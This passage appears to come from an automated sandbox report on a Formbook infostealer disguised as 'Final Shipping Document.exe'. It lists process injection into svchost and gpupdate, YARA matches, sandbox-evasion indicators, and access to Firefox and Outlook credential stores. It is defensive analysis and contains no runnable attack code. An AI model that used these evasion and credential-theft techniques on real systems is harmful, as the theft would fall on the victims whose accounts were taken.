            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6E4355_2_04D6E435
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6E7D45_2_04D6E7D4
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6E3155_2_04D6E315
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04D6D8385_2_04D6D838
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 111 times
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: String function: 00BC0A30 appears 46 times
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: String function: 00BA9CB3 appears 31 times
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: String function: 00BBF9F2 appears 40 times
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: String function: 04F17E54 appears 111 times
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: String function: 04EBB970 appears 280 times
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: String function: 04F4F290 appears 105 times
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: String function: 04F05130 appears 58 times
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: String function: 04F3EA12 appears 86 times
            Source: Final Shipping Document.exe, 00000000.00000003.2036830324.000000000418D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Final Shipping Document.exe
            Source: Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003FE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Final Shipping Document.exe
            Source: Final Shipping Document.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@13/8
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C137B5 GetLastError,FormatMessageW,0_2_00C137B5
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C010BF AdjustTokenPrivileges,CloseHandle,0_2_00C010BF
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C016C3
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C151CD
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C2A67C
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C1648E
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00BA42A2
            Source: C:\Users\user\Desktop\Final Shipping Document.exeFile created: C:\Users\user\AppData\Local\Temp\autEBF.tmpJump to behavior
            Source: Final Shipping Document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: gpupdate.exe, 00000005.00000003.2656659944.00000000031CE000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3888691030.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3888691030.00000000031C6000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2645909061.00000000031C6000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2645709837.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Final Shipping Document.exeReversingLabs: Detection: 63%
            Source: unknownProcess created: C:\Users\user\Desktop\Final Shipping Document.exe "C:\Users\user\Desktop\Final Shipping Document.exe"
            Source: C:\Users\user\Desktop\Final Shipping Document.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Final Shipping Document.exe"
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Final Shipping Document.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Final Shipping Document.exe"Jump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Final Shipping Document.exeStatic file information: File size 1225216 > 1048576
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Final Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: gpupdate.pdb source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gpupdate.pdbGCTL source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QnAcfZuONg.exe, 00000004.00000002.3888447238.00000000001AE000.00000002.00000001.01000000.00000005.sdmp, QnAcfZuONg.exe, 00000007.00000002.3888452775.00000000001AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: Final Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Final Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Final Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Final Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Final Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BA42DE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC0A76 push ecx; ret 0_2_00BC0A89
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C35959 push ebp; ret 0_2_00C3595F
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C35968 push edi; ret 0_2_00C3596B
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C3596C push ebp; ret 0_2_00C3596F
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C35971 push esi; ret 0_2_00C35973
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C35975 push edi; ret 0_2_00C35977
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C35978 push ebp; ret 0_2_00C3597B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004243A3 pushfd ; ret 2_2_0042443D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401868 push edi; iretd 2_2_00401875
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405068 push es; ret 2_2_00405088
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E87B push ds; retf 2_2_0041E87E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004149D3 push edi; retf 2_2_004149D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402187 push ecx; retf 2_2_0040218D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411A4B push ds; iretd 2_2_00411A4E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405271 push eax; iretd 2_2_00405272
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040527D pushad ; iretd 2_2_00405290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411A14 push 88522CE7h; ret 2_2_00411A20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ACE push ebx; iretd 2_2_00416AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414376 push 0000004Eh; iretd 2_2_004143A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418B9D push FFFFFF8Eh; iretd 2_2_00418BDF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143AC push ebp; iretd 2_2_004143AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403450 push eax; ret 2_2_00403452
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AC9C pushfd ; ret 2_2_0040AC9D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401D12 push ecx; retf 2_2_00401D13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041953F push ecx; iretd 2_2_00419540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401DD3 push edx; retf 2_2_00401DD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040174C push edi; iretd 2_2_0040174D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FF7 push esp; iretd 2_2_00402017
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017A3 push edi; iretd 2_2_004017D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330225F pushad ; ret 2_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033027FA pushad ; ret 2_2_033027F9
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00BBF98E
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C31C41
            Source: C:\Users\user\Desktop\Final Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\Final Shipping Document.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-100461
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Final Shipping Document.exeAPI/Special instruction interceptor: Address: 1573234
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\gpupdate.exeWindow / User API: threadDelayed 2725Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeWindow / User API: threadDelayed 7247Jump to behavior
            Source: C:\Users\user\Desktop\Final Shipping Document.exeAPI coverage: 4.2 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
